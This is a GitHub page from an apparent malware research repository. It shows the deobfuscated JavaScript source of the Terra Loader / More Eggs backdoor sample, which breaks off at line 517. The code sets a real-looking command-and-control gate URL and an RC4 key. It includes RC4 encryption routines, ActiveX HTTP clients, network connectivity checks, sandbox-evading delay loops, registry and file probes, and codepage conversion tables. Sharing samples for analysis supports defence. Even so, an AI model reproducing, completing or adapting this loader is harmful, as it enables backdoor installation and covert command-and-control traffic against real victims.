Skip to content
Permalink
Malware-Misc-RE/2019-04-18-Terra Loader - More Eggs Signed Loader.js
Newer
Older
Raw Normal view History
100644 518 lines (500 sloc) 12.8 KB
@k-vitali
Create 2019-04-18-Terra Loader - More Eggs Signed Loader.js
Apr 19, 2019
1
// sample from SHA256: e9a6a275d20b73605c7af7c48140baeff0258b185a315a6beb54d373740a8b14
2
// signed malware install loader -> JS Terra Loader aka more_eggs backdoor
3
// h/t @malwarehunterteam
4
5
function anonymous() {
6
var BV = "6.1";
7
var Gate = "https://report.monicabellucci.kz/295693495/info";
8
var hit_each = 10;
9
var error_retry = 2;
10
var restart_h = 4;
11
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
12
var Rkey = "ltgjjhh6iogejlaDKFgdf";
13
var rcon_now = 0;
14
var gtfo = false;
15
var selfdel = false;
16
var table = [];
17
var Build = "";
18
var PCN = "";
19
var UNM = "";
20
var SYSTEM = 0;
21
var rootK = "HKCU";
22
var workingDir = "";
23
var main_mitm = "";
24
var xApp = "";
25
var xTmp = "";
26
var PreserveH = "";
27
var xStore = "";
28
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
29
30
function obj(xString) {
31
return new ActiveXObject(xString);
32
}
33
var con;
34
try {
35
con = obj("Msxml2.XMLHTTP.6.0");
36
} catch (e) {
37
try {
38
con = obj("Msxml2.XMLHTTP.3.0");
39
} catch (e2) {
40
con = obj("Microsoft.XMLHTTP");
41
}
42
}
43
var xhr;
44
try {
45
xhr = obj("Msxml2.ServerXMLHTTP.6.0");
46
} catch (e3) {
47
xhr = obj("Msxml2.ServerXMLHTTP.3.0");
48
}
49
50
function check_Net(method) {
51
var Resp = false;
52
var conz1;
53
var t11 = "";
54
if (method === 1) {
55
conz1 = xhr;
56
} else {
57
conz1 = con;
58
}
59
try {
60
conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
61
} catch (e1) {
62
if (method === 0) {
63
return check_Net(1);
64
} else {
65
return false;
66
}
67
}
68
conz1.onreadystatechange = function() {
69
if (conz1.readyState === 4) {
70
if (conz1.status === 200) {
71
t11 = conz1.responseText;
72
if (t11) {
73
if (t11 == 'This is another XSL namespace\n') {
74
Resp = true;
75
} else {
76
Resp = false;
77
}
78
} else {
79
Resp = false;
80
}
81
} else {
82
Resp = false;
83
}
84
}
85
};
86
try {
87
conz1.send();
88
} catch (e2) {
89
if (method === 0) {
90
return check_Net(1);
91
} else {
92
return false;
93
}
94
}
95
return Resp;
96
}
97
98
function cLength(mstr, min, max) {
99
var n = mstr.length;
100
if (n === 0) {
101
return false;
102
}
103
if (n >= min && (n <= max)) {
104
return true;
105
}
106
}
107
108
function rInt(min, max) {
109
min = Math.ceil(min);
110
max = Math.floor(max);
111
return Math.floor(Math.random() * (max - min + 1)) + min;
112
}
113
114
function rStr(len) {
115
var xRnd = "";
116
var i;
117
var randomPoz;
118
var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
119
i = 0;
120
do {
121
randomPoz = Math.floor(Math.random() * charSet.length);
122
xRnd += charSet.substring(randomPoz, randomPoz + 1);
123
i += 1;
124
} while (i < len);
125
return xRnd;
126
}
127
128
function fuck_js() {
129
var xNow = rInt(8, 32);
130
var rNow = rStr(xNow);
131
try {
132
xhr.setTimeouts(5000, 5000, 10000, 10000);
133
xhr.open("GET", "http://8.8.8.8/" + rNow, false);
134
xhr.send();
135
} catch (e9) {
136
return false;
137
}
138
}
139
140
function waitfor(zMinute) {
141
var limit = Date.parse(Date()) + (zMinute * 60000);
142
while (Date.parse(Date()) < limit) {
143
fuck_js();
144
}
145
main();
146
}
147
148
function waitfor2(zMinute, iGo) {
149
var xlmt;
150
xlmt = Date.parse(Date()) + (zMinute * 60000);
151
while (Date.parse(Date()) < xlmt) {
152
fuck_js();
153
}
154
if (iGo === 1) {
155
go();
156
}
157
}
158
159
function fexist(xpath) {
160
var fso;
161
try {
162
fso = obj("Scripting.FileSystemObject");
163
if (fso.FileExists(xpath)) {
164
return true;
165
} else {
166
return false;
167
}
168
} catch (feer) {
169
return false;
170
}
171
}
172
173
function rexist(xpath) {
174
var sh;
175
var rdata;
176
try {
177
sh = obj("Wscript.shell");
178
rdata = sh.RegRead(xpath);
179
if (rdata !== null) {
180
return true;
181
}
182
} catch (e71) {
183
return false;
184
}
185
}
186
187
function myEnv(xVar, xSystem) {
188
var a1;
189
var rEnv;
190
a1 = obj("WScript.Shell");
191
if (xSystem === 1) {
192
rEnv = a1.environment("SYSTEM");
193
} else {
194
rEnv = a1.environment("PROCESS");
195
}
196
return rEnv(xVar);
197
}
198
199
function myBits() {
200
var xBits;
201
xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
202
if (xBits === "AMD64") {
203
return "64";
204
} else {
205
return "86";
206
}
207
}
208
209
function zzzz4(key, str) {
210
var s = [];
211
var j = 0;
212
var x;
213
var res = "";
214
var i;
215
var y;
216
if (key && str) {
217
i = 0;
218
do {
219
s[i] = i;
220
i += 1;
221
} while (i < 256);
222
i = 0;
223
do {
224
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
225
x = s[i];
226
s[i] = s[j];
227
s[j] = x;
228
i += 1;
229
} while (i < 256);
230
i = 0;
231
j = 0;
232
y = 0;
233
do {
234
i = (i + 1) % 256;
235
j = (j + s[i]) % 256;
236
x = s[i];
237
s[i] = s[j];
238
s[j] = x;
239
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
240
y += 1;
241
} while (y < str.length);
242
}
243
return res;
244
}
245
246
function zzz4Bytes(xArray, key) {
247
var s = [];
248
var j = 0;
249
var x;
250
var outBytes = [];
251
var i;
252
var y;
253
if (key && xArray) {
254
i = 0;
255
do {
256
s[i] = i;
257
i += 1;
258
} while (i < 256);
259
i = 0;
260
do {
261
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
262
x = s[i];
263
s[i] = s[j];
264
s[j] = x;
265
i += 1;
266
} while (i < 256);
267
i = 0;
268
j = 0;
269
y = 0;
270
do {
271
i = (i + 1) % 256;
272
j = (j + s[i]) % 256;
273
x = s[i];
274
s[i] = s[j];
275
s[j] = x;
276
outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
277
y += 1;
278
} while (y < xArray.length);
279
}
280
return outBytes;
281
}
282
283
function tB(htc) {
284
var y = [];
285
y[0xC7] = 0x80;
286
y[0xFC] = 0x81;
287
y[0xE9] = 0x82;
288
y[0xE2] = 0x83;
289
y[0xE4] = 0x84;
290
y[0xE0] = 0x85;
291
y[0xE5] = 0x86;
292
y[0xE7] = 0x87;
293
y[0xEA] = 0x88;
294
y[0xEB] = 0x89;
295
y[0xE8] = 0x8A;
296
y[0xEF] = 0x8B;
297
y[0xEE] = 0x8C;
298
y[0xEC] = 0x8D;
299
y[0xC4] = 0x8E;
300
y[0xC5] = 0x8F;
301
y[0xC9] = 0x90;
302
y[0xE6] = 0x91;
303
y[0xC6] = 0x92;
304
y[0xF4] = 0x93;
305
y[0xF6] = 0x94;
306
y[0xF2] = 0x95;
307
y[0xFB] = 0x96;
308
y[0xF9] = 0x97;
309
y[0xFF] = 0x98;
310
y[0xD6] = 0x99;
311
y[0xDC] = 0x9A;
312
y[0xA2] = 0x9B;
313
y[0xA3] = 0x9C;
314
y[0xA5] = 0x9D;
315
y[0x20A7] = 0x9E;
316
y[0x192] = 0x9F;
317
y[0xE1] = 0xA0;
318
y[0xED] = 0xA1;
319
y[0xF3] = 0xA2;
320
y[0xFA] = 0xA3;
321
y[0xF1] = 0xA4;
322
y[0xD1] = 0xA5;
323
y[0xAA] = 0xA6;
324
y[0xBA] = 0xA7;
325
y[0xBF] = 0xA8;
326
y[0x2310] = 0xA9;
327
y[0xAC] = 0xAA;
328
y[0xBD] = 0xAB;
329
y[0xBC] = 0xAC;
330
y[0xA1] = 0xAD;
331
y[0xAB] = 0xAE;
332
y[0xBB] = 0xAF;
333
y[0x2591] = 0xB0;
334
y[0x2592] = 0xB1;
335
y[0x2593] = 0xB2;
336
y[0x2502] = 0xB3;
337
y[0x2524] = 0xB4;
338
y[0x2561] = 0xB5;
339
y[0x2562] = 0xB6;
340
y[0x2556] = 0xB7;
341
y[0x2555] = 0xB8;
342
y[0x2563] = 0xB9;
343
y[0x2551] = 0xBA;
344
y[0x2557] = 0xBB;
345
y[0x255D] = 0xBC;
346
y[0x255C] = 0xBD;
347
y[0x255B] = 0xBE;
348
y[0x2510] = 0xBF;
349
y[0x2514] = 0xC0;
350
y[0x2534] = 0xC1;
351
y[0x252C] = 0xC2;
352
y[0x251C] = 0xC3;
353
y[0x2500] = 0xC4;
354
y[0x253C] = 0xC5;
355
y[0x255E] = 0xC6;
356
y[0x255F] = 0xC7;
357
y[0x255A] = 0xC8;
358
y[0x2554] = 0xC9;
359
y[0x2569] = 0xCA;
360
y[0x2566] = 0xCB;
361
y[0x2560] = 0xCC;
362
y[0x2550] = 0xCD;
363
y[0x256C] = 0xCE;
364
y[0x2567] = 0xCF;
365
y[0x2568] = 0xD0;
366
y[0x2564] = 0xD1;
367
y[0x2565] = 0xD2;
368
y[0x2559] = 0xD3;
369
y[0x2558] = 0xD4;
370
y[0x2552] = 0xD5;
371
y[0x2553] = 0xD6;
372
y[0x256B] = 0xD7;
373
y[0x256A] = 0xD8;
374
y[0x2518] = 0xD9;
375
y[0x250C] = 0xDA;
376
y[0x2588] = 0xDB;
377
y[0x2584] = 0xDC;
378
y[0x258C] = 0xDD;
379
y[0x2590] = 0xDE;
380
y[0x2580] = 0xDF;
381
y[0x3B1] = 0xE0;
382
y[0xDF] = 0xE1;
383
y[0x393] = 0xE2;
384
y[0x3C0] = 0xE3;
385
y[0x3A3] = 0xE4;
386
y[0x3C3] = 0xE5;
387
y[0xB5] = 0xE6;
388
y[0x3C4] = 0xE7;
389
y[0x3A6] = 0xE8;
390
y[0x398] = 0xE9;
391
y[0x3A9] = 0xEA;
392
y[0x3B4] = 0xEB;
393
y[0x221E] = 0xEC;
394
y[0x3C6] = 0xED;
395
y[0x3B5] = 0xEE;
396
y[0x2229] = 0xEF;
397
y[0x2261] = 0xF0;
398
y[0xB1] = 0xF1;
399
y[0x2265] = 0xF2;
400
y[0x2264] = 0xF3;
401
y[0x2320] = 0xF4;
402
y[0x2321] = 0xF5;
403
y[0xF7] = 0xF6;
404
y[0x2248] = 0xF7;
405
y[0xB0] = 0xF8;
406
y[0x2219] = 0xF9;
407
y[0xB7] = 0xFA;
408
y[0x221A] = 0xFB;
409
y[0x207F] = 0xFC;
410
y[0xB2] = 0xFD;
411
y[0x25A0] = 0xFE;
412
y[0xA0] = 0xFF;
413
var ami = [];
414
var mi;
415
var renderer;
416
var atends;
417
mi = 0;
418
do {
419
renderer = htc.charCodeAt(mi);
420
if (renderer < 128) {
421
atends = renderer;
422
} else {
423
atends = y[renderer];
424
}
425
ami.push(atends);
426
mi += 1;
427
} while (mi < htc.length);
428
return ami;
429
}
430
431
function tS(arenderer) {
432
var x = [];
433
x[0x80] = 0x00C7;
434
x[0x81] = 0x00FC;
435
x[0x82] = 0x00E9;
436
x[0x83] = 0x00E2;
437
x[0x84] = 0x00E4;
438
x[0x85] = 0x00E0;
439
x[0x86] = 0x00E5;
440
x[0x87] = 0x00E7;
441
x[0x88] = 0x00EA;
442
x[0x89] = 0x00EB;
443
x[0x8A] = 0x00E8;
444
x[0x8B] = 0x00EF;
445
x[0x8C] = 0x00EE;
446
x[0x8D] = 0x00EC;
447
x[0x8E] = 0x00C4;
448
x[0x8F] = 0x00C5;
449
x[0x90] = 0x00C9;
450
x[0x91] = 0x00E6;
451
x[0x92] = 0x00C6;
452
x[0x93] = 0x00F4;
453
x[0x94] = 0x00F6;
454
x[0x95] = 0x00F2;
455
x[0x96] = 0x00FB;
456
x[0x97] = 0x00F9;
457
x[0x98] = 0x00FF;
458
x[0x99] = 0x00D6;
459
x[0x9A] = 0x00DC;
460
x[0x9B] = 0x00A2;
461
x[0x9C] = 0x00A3;
462
x[0x9D] = 0x00A5;
463
x[0x9E] = 0x20A7;
464
x[0x9F] = 0x0192;
465
x[0xA0] = 0x00E1;
466
x[0xA1] = 0x00ED;
467
x[0xA2] = 0x00F3;
468
x[0xA3] = 0x00FA;
469
x[0xA4] = 0x00F1;
470
x[0xA5] = 0x00D1;
471
x[0xA6] = 0x00AA;
472
x[0xA7] = 0x00BA;
473
x[0xA8] = 0x00BF;
474
x[0xA9] = 0x2310;
475
x[0xAA] = 0x00AC;
476
x[0xAB] = 0x00BD;
477
x[0xAC] = 0x00BC;
478
x[0xAD] = 0x00A1;
479
x[0xAE] = 0x00AB;
480
x[0xAF] = 0x00BB;
481
x[0xB0] = 0x2591;
482
x[0xB1] = 0x2592;
483
x[0xB2] = 0x2593;
484
x[0xB3] = 0x2502;
485
x[0xB4] = 0x2524;
486
x[0xB5] = 0x2561;
487
x[0xB6] = 0x2562;
488
x[0xB7] = 0x2556;
489
x[0xB8] = 0x2555;
490
x[0xB9] = 0x2563;
491
x[0xBA] = 0x2551;
492
x[0xBB] = 0x2557;
493
x[0xBC] = 0x255D;
494
x[0xBD] = 0x255C;
495
x[0xBE] = 0x255B;
496
x[0xBF] = 0x2510;
497
x[0xC0] = 0x2514;
498
x[0xC1] = 0x2534;
499
x[0xC2] = 0x252C;
500
x[0xC3] = 0x251C;
501
x[0xC4] = 0x2500;
502
x[0xC5] = 0x253C;
503
x[0xC6] = 0x255E;
504
x[0xC7] = 0x255F;
505
x[0xC8] = 0x255A;
506
x[0xC9] = 0x2554;
507
x[0xCA] = 0x2569;
508
x[0xCB] = 0x2566;
509
x[0xCC] = 0x2560;
510
x[0xCD] = 0x2550;
511
x[0xCE] = 0x256C;
512
x[0xCF] = 0x2567;
513
x[0xD0] = 0x2568;
514
x[0xD1] = 0x2564;
515
x[0xD2] = 0x2565;
516
517
...
518
///